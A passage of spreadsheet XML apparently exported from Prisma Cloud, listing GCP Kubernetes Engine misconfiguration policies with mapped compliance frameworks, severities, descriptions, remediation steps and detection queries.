        <v>1</v>
      </c>
      <c r="AE2893" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2893" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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3" t="inlineStr">
        <is>
          <t>bee0893d-85fb-403f-9ba7-a5269a46d382</t>
        </is>
      </c>
      <c r="AI2893" t="inlineStr">
        <is>
          <t>21c101a0-ef0f-46b6-901e-7284abc6258a</t>
        </is>
      </c>
      <c r="AJ2893" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2893" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2894">
      <c r="A2894" t="inlineStr">
        <is>
          <t>Copy of CIS Controls v8, ISO/IEC 27001:2022, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CIS v1.3.0 (GKE) - Level 2, CIS v1.2.0 (GKE), ISO/IEC 27017:2015, CIS v1.1.0 (GKE), CSA CCM v.4.0.1, Microsoft Cloud Security Benchmark v1, APRA (CPS 234) Information Security, tadenugba Copy of CIS v1.1.0 (GKE), CIS Controls v7.1, Copy of ACSC Information Security Manual (ISM)-clone, CIS v1.5.0 (GKE) - Level 2, ISO/IEC 27017:2015, ISO 27001:2013, ISO/IEC 27017:2015, CIS Controls v7.1, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, NIST CSF, ISO 27001:2013, CIS Controls v8.1, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, ISO 27002:2022, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v4.0, PCI DSS v3.2.1, ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, CIS v1.0.0 (GCP), ISO/IEC 27017:2015, CSA CCM v.4.0.1, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, CIS v1.4.0 (GKE) - Level 2, CSA CCM v.4.0.1, PCI DSS v4.0, ISO/IEC 27002:2013, FFIEC, PCI DSS v4.0, APRA (CPS 234) Information Security, HITRUST v.9.4.2 [Deprecated], PCI DSS v4.0, ISO 27001:2013, PCI DSS v4.0, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), CCPA 2018, ISO/IEC 27001:2022, PIPEDA, CIS Controls v8.1, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, NIST SP 800-172, CSA CCM v.4.0.1, PCI DSS v4.0, CSA CCM v.4.0.1, ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2894" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2894" s="2" t="inlineStr"/>
      <c r="D2894" t="n">
        <v>0</v>
      </c>
      <c r="E2894" t="n">
        <v>58</v>
      </c>
      <c r="F2894" t="n">
        <v>0</v>
      </c>
      <c r="G2894" t="b">
        <v>1</v>
      </c>
      <c r="H28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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2894" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2894" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine private cluster has private endpoint disabled</t>
        </is>
      </c>
      <c r="L2894" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2894" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2894" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2894" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2894" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2894" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2894" t="inlineStr">
        <is>
          <t>ISM-1409</t>
        </is>
      </c>
      <c r="S2894" t="inlineStr"/>
      <c r="T2894" t="b">
        <v>0</v>
      </c>
      <c r="U2894" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2894" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2894" t="inlineStr">
        <is>
          <t>This policy identifies GCP Kubernetes Engine private clusters with private endpoint disabled. A public endpoint might expose the current cluster and Kubernetes API version and an attacker may be able to determine whether it is vulnerable to an attack. Unless required, disabling the public endpoint will help prevent such threats, and require the attacker to be on the master's VPC network to perform any attack on the Kubernetes API. It is recommended to enable the private endpoint and disable public access on Kubernetes clusters.</t>
        </is>
      </c>
      <c r="X2894" t="inlineStr">
        <is>
          <t>Once a cluster is created without enabling Private Endpoint, it cannot be remediated. Rather, the cluster must be recreated. 
To create the private cluster with public access disabled, refer to the below link,
https://cloud.google.com/kubernetes-engine/docs/how-to/private-clusters#private_cp
To resolve the alert, ensure deletion of the old cluster after the new private cluster is created and is in running state and once all the data has been migrated. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-6
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-6</t>
        </is>
      </c>
      <c r="Y2894" t="inlineStr"/>
      <c r="Z2894" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = status equals RUNNING and privateClusterConfig exists and privateClusterConfig.enablePrivateEndpoint does not exist
{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA2894" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2894" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2894" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-204-CKV_GCP_25</t>
        </is>
      </c>
      <c r="AD2894" t="b">
        <v>1</v>
      </c>
      <c r="AE2894" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2894" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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4" t="inlineStr">
        <is>
          <t>1478c66d-2911-4a19-80fb-ddc36ab2a270</t>
        </is>
      </c>
      <c r="AI2894" t="inlineStr">
        <is>
          <t>f698d4a8-6ee8-40b4-9cf1-211901b00ca3</t>
        </is>
      </c>
      <c r="AJ2894" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2894" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2895">
      <c r="A2895" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, ISO/IEC 27001:2022, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, GDPR, NIST 800-53 Rev 5, NIST CSF, NYDFS 23 CRR-NY 500.0, HITRUST v.9.4.2 [Deprecated], kashan ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), Telecommunications Security Act - TSA, ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v8.2 [Deprecated], CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO/IEC 27017:2015, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, NIST 800-53 Rev 5, CSA CCM v.4.0.1, PCI DSS v4.0, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, CIS Controls v8.1, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, NIST 800-53 Rev 5, Copy of ACSC Information Security Manual (ISM)-clone, HIPAA, CIS Controls v7.1, NIST CSF, CSA CCM v.4.0.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CDC NIST 800-53 Rev4, MITRE ATT&amp;CK v8.2 [Deprecated], NIST 800-53 Rev 5, PCI DSS v3.2.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27017:2015, NIST SP 800-172, CSA CCM v.4.0.1, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, Fedramp (Moderate), Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), MITRE ATT&amp;CK v10.0 [Deprecated], Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST CSF, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1, MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, PCI DSS v4.0, ISO/IEC 27017:2015, SOC 2, kashan ACSC Information Security Manual (ISM), Demo_Daryl ACSC Information Security Manual (ISM), NIST CSF, MITRE ATT&amp;CK v6.3 [Deprecated], NIST 800-53 Rev4, Matt's ATT&amp;ACK, CSA CCM v.4.0.1, SOC 2, NIST 800-53 Rev 5, CSA CCM v.4.0.1, PCI DSS v4.0, CSA CCM v.4.0.1, NIST 800-53 Rev 5, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), APRA (CPS 234) Information Security, CIS Controls v8, NIST CSF, ISO/IEC 27002:2013, Copy of CIS Controls v8, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST CSF, CSA CCM v.4.0.1, RBI Baseline Cyber Security and Resilience Requirements, TX-RAMP Level 1, NIST CSF, NIST CSF, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, NIST 800-53 Rev4, ISO/IEC 27002:2013, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27001:2022, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, PCI DSS v4.0, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2895" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2895" s="2" t="inlineStr"/>
      <c r="D2895" t="inlineStr"/>
      <c r="E2895" t="inlineStr"/>
      <c r="F2895" t="inlineStr"/>
      <c r="G2895" t="b">
        <v>1</v>
      </c>
      <c r="H28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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2895" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2895" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Clusters network firewall inbound rule overly permissive to all traffic</t>
        </is>
      </c>
      <c r="L2895" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2895" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2895" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2895" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2895" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2895" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2895" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2895" t="inlineStr"/>
      <c r="T2895" t="b">
        <v>0</v>
      </c>
      <c r="U2895" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2895" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2895" t="inlineStr">
        <is>
          <t>This policy identifies Firewall rules attached to the cluster network which allows inbound traffic on all protocols from the public internet. Doing so may allow a bad actor to brute force their way into the system and potentially get access to the entire cluster network.</t>
        </is>
      </c>
      <c r="X2895" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to VPC network (Left Panel)
3. Select Firewall rules
4. Click on the reported firewall rule
5. Click on the 'EDIT' button
6. Change the 'Source IP ranges' other than '0.0.0.0/0'
7. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2895" t="inlineStr"/>
      <c r="Z2895" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-container-describe-clusters' as X; config from cloud.resource where api.name = 'gcloud-compute-firewall-rules-list' as Y; filter '$.Y.network contains $.X.network and $.Y.sourceRanges contains 0.0.0.0/0 and $.Y.direction contains INGRESS and $.Y.allowed exists'; show Y;</t>
        </is>
      </c>
      <c r="AA2895" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2895" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2895" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-368</t>
        </is>
      </c>
      <c r="AD2895" t="b">
        <v>1</v>
      </c>
      <c r="AE2895" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2895" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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5" t="inlineStr">
        <is>
          <t>731e447b-1bd0-4e79-a9b6-e022d278d9d9</t>
        </is>
      </c>
      <c r="AI2895" t="inlineStr">
        <is>
          <t>4717b8fc-74b2-404a-84ec-0518180d58fc</t>
        </is>
      </c>
      <c r="AJ2895" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2895" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2896">
      <c r="A2896" t="inlineStr">
        <is>
          <t>Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v4.0.12, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, CRI Profile v1.2.1, NIST CSF v2.0, NIST SP 800-172, CIS Controls v8, ACSC Information Security Manual (ISM), ISO/IEC 27017:2015, Australian Cyber Security Centre (ACSC) Essential Eight, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CIS Controls v7.1, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8.1, FFIEC, Copy of CIS Controls v8, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, CSA CCM v.4.0.6, CSA CCM v.4.0.6, PCI DSS v4.0, ISO/IEC 27017:2015, ISO/IEC 27017:2015, CSA CCM v.4.0.6, CRI Profile v2.0, DORA, Secure Controls Framework (SCF) - 2024.2, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev 5, Copy of New Zealand Information Security Manual (NZISM v3.4), NIST CSF, CRI Profile v1.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST SP 800-171 Revision 3, ISO 27002:2022, Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CSA CCM v.4.0.1, Copy of CIS Controls v8, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, CIS Controls v8, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27001:2022, kashan ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), CSA CCM v.4.0.1, FFIEC, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), TX-RAMP Level 1, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, HITRUST v.9.4.2 [Deprecated], CIS Controls v7.1, NIST CSF v2.0, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, CIS Controls v8.1, PCI DSS v4.0, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, RBI Baseline Cyber Security and Resilience Requirements, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements</t>
        </is>
      </c>
      <c r="B2896" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2896" s="2" t="inlineStr"/>
      <c r="D2896" t="inlineStr"/>
      <c r="E2896" t="inlineStr"/>
      <c r="F2896" t="inlineStr"/>
      <c r="G2896" t="b">
        <v>1</v>
      </c>
      <c r="H28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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2896" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2896" t="inlineStr">
        <is>
          <t>GCP GKE unsupported node version</t>
        </is>
      </c>
      <c r="L2896" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2896" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2896" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2896" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2896" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2896" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2896" t="inlineStr">
        <is>
          <t>ISM-1407</t>
        </is>
      </c>
      <c r="S2896" t="inlineStr"/>
      <c r="T2896" t="b">
        <v>0</v>
      </c>
      <c r="U2896" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2896" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2896" t="inlineStr">
        <is>
          <t>This policy identifies the GKE node version and generates an alert if the version running is unsupported.
Using an unsupported version of Google Kubernetes Engine (GKE) on Google Cloud Platform (GCP) can lead to several potential issues and risks, such as security vulnerabilities, compatibility issues, performance and stability problems, and compliance concerns. To mitigate these risks, it's crucial to regularly update the GKE clusters to supported versions recommended by Google Cloud.
As a security best practice, it is always recommended to use the latest version of GKE.
Note: The Policy updates will be made as per the release schedule https://cloud.google.com/kubernetes-engine/docs/release-schedule#schedule-for-release-channels</t>
        </is>
      </c>
      <c r="X2896" t="inlineStr">
        <is>
          <t>Manually upgrading your nodes:
1. Visit the Google Kubernetes Engine Clusters menu in GCP Console.
2. Next to the cluster you want to edit, Click the Edit button which looks like a pencil under Actions.
3. On the Cluster details page, click the Nodes tab.
4. In the Node Pools section, click the name of the node pool that you want to upgrade.
5. Click the Edit button which looks like a pencil.
6. Click "Change" under Node version.
7. Select the desired version from the Node version drop-down list, then click "Upgrade".</t>
        </is>
      </c>
      <c r="Y2896" t="inlineStr"/>
      <c r="Z2896" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = NOT ( currentNodeVersion starts with "1.27." or currentNodeVersion starts with "1.28." or currentNodeVersion starts with "1.29." or currentNodeVersion starts with "1.30."  or currentNodeVersion starts with "1.31.")</t>
        </is>
      </c>
      <c r="AA2896" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2896" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2896" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-396</t>
        </is>
      </c>
      <c r="AD2896" t="b">
        <v>1</v>
      </c>
      <c r="AE2896" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2896" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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6" t="inlineStr">
        <is>
          <t>382813de-b7d2-446b-ad5e-bdec9464df66</t>
        </is>
      </c>
      <c r="AI2896" t="inlineStr">
        <is>
          <t>7cf55065-4062-4ea9-8de0-a182e0577728</t>
        </is>
      </c>
      <c r="AJ2896" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2896" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2897">
      <c r="A2897" t="inlineStr">
        <is>
          <t>PCI DSS v4.0, Sarbanes Oxley Act (SOX), CIS Controls v8, ISO/IEC 27017:2015, CIS Controls v8.1, NIST SP 800-172, CIS v1.3.0 (GKE) - Level 1, Copy of CIS Controls v8, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, PCI DSS v4.0, ITSG-33, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), FFIEC, PCI DSS v4.0, HITRUST CSF v.11.2.0, CIS Controls v7.1, Microsoft Cloud Security Benchmark v1, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.6, ISO/IEC 27017:2015, CIS Controls v8, ISO/IEC 27017:2015, TX-RAMP Level 1, TX-RAMP Level 2, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27001:2022, RBI Baseline Cyber Security and Resilience Requirements, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, ITSG-33, CIS v1.4.0 (GKE) - Level 1, ISO/IEC 27017:2015, Copy of CIS Controls v8, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, ISO 27002:2022, CSA CCM v.4.0.1, NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, PCI DSS v3.2.1, tadenugba Copy of CIS v1.1.0 (GKE), ISO/IEC 27002:2013, CIS Controls v7.1, NIST 800-53 Rev 5, ISO/IEC 27017:2015, ITSG-33, CIS Controls v8.1, CSA CCM v.4.0.1, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, ISO/IEC 27001:2022, TX-RAMP Level 1, PCI DSS v4.0, CSA CCM v.4.0.1, CRI Profile v1.2.1, ISO/IEC 27002:2013, PCI DSS v4.0, CRI Profile v2.0, NYDFS 23 CRR-NY 500.0, NIST CSF v2.0, CIS v1.2.0 (GKE), HITRUST v.9.4.2 [Deprecated], Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, CIS v1.5.0 (GKE) - Level 1, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), CSA CCM v4.0.12, ACSC Information Security Manual (ISM), NIST SP 800-171 Revision 2, PCI DSS v4.0, CIS v1.1.0 (GKE), NIST SP 800-172, CSA CCM v.4.0.1, TX-RAMP Level 2, PCI DSS v4.0, CSA CCM v.4.0.1, ISO/IEC 27018:2019, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B2897" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2897" s="2" t="inlineStr"/>
      <c r="D2897" t="inlineStr"/>
      <c r="E2897" t="inlineStr"/>
      <c r="F2897" t="inlineStr"/>
      <c r="G2897" t="b">
        <v>1</v>
      </c>
      <c r="H28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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2897" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2897" t="inlineStr">
        <is>
          <t>GCP Kubernetes cluster shielded GKE node with integrity monitoring disabled</t>
        </is>
      </c>
      <c r="L2897" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2897" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2897" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2897" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2897" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2897" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2897" t="inlineStr">
        <is>
          <t>ISM-1409</t>
        </is>
      </c>
      <c r="S2897" t="inlineStr"/>
      <c r="T2897" t="b">
        <v>0</v>
      </c>
      <c r="U2897" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2897" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2897" t="inlineStr">
        <is>
          <t>This policy identifies GCP Kubernetes cluster shielded GKE nodes that are not enabled with Integrity Monitoring. Integrity Monitoring provides active alerting for Shielded GKE nodes which allows administrators to respond to integrity failures and prevent compromised nodes from being deployed into the cluster.</t>
        </is>
      </c>
      <c r="X2897" t="inlineStr">
        <is>
          <t>Note: Once a Node pool is provisioned, it cannot be updated to enable Integrity monitoring. You must create new Node pools within the cluster with Integrity monitoring enabled. You will also need to migrate workloads from existing non-conforming Node pools to the newly created Node pool, then delete the non-conforming pools.
To create a node pool with Integrity monitoring enabled follow the below steps,
1. Log in to gcloud console
2. Navigate to service 'Kubernetes Engine'
3. Select the alerted cluster and click 'ADD NODE POOL'
4. Ensure that the 'Enable integrity monitoring' checkbox is checked under the 'Shielded options' in section 'Security'
5. Click on 'CREATE'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-integrity-monitoring-for-shielded-gke-nodes-is-enabled
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-integrity-monitoring-for-shielded-gke-nodes-is-enabled</t>
        </is>
      </c>
      <c r="Y2897" t="inlineStr"/>
      <c r="Z2897" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = nodePools[?any(config.shieldedInstanceConfig.enableIntegrityMonitoring does not exist or config.shieldedInstanceConfig.enableIntegrityMonitoring is false)] exists
{"category":"Kubernetes","resourceTypes":["google_container_node_pool","google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA2897" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2897" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2897" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-575-CKV_GCP_72</t>
        </is>
      </c>
      <c r="AD2897" t="b">
        <v>1</v>
      </c>
      <c r="AE2897" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2897" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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7" t="inlineStr">
        <is>
          <t>d64da692-874d-48fd-9acf-391473ae94c9</t>
        </is>
      </c>
      <c r="AI2897" t="inlineStr">
        <is>
          <t>39cdd589-3814-4f97-9101-a2204f8721e0</t>
        </is>
      </c>
      <c r="AJ2897" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2897" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2898">
      <c r="A2898" t="inlineStr">
        <is>
